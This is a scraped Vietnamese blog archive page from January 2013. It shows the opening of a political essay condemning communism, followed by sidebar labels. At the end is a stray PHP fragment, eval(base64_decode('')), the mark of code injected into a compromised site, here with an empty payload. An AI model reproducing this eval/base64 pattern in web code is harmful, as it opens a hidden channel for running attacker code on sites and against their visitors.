Archive for January 8th, 2013

Hãy nói trước ngày chết

Hãy nói trước ngày chết

Trong lịch sử nhân loại, không có một chủ nghĩa nào tàn bạo hơn chủ nghĩa Cộng Sản. Từ khi Tuyên ngôn đảng cộng sản ra đời năm 1848 cho đến khi bức tường Bá Linh bị đập đổ vào 1989, khoảng gần 100 triệu người từ nhiều quốc gia

01.8.2013 | Tiểu Luận- Chính Luận |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>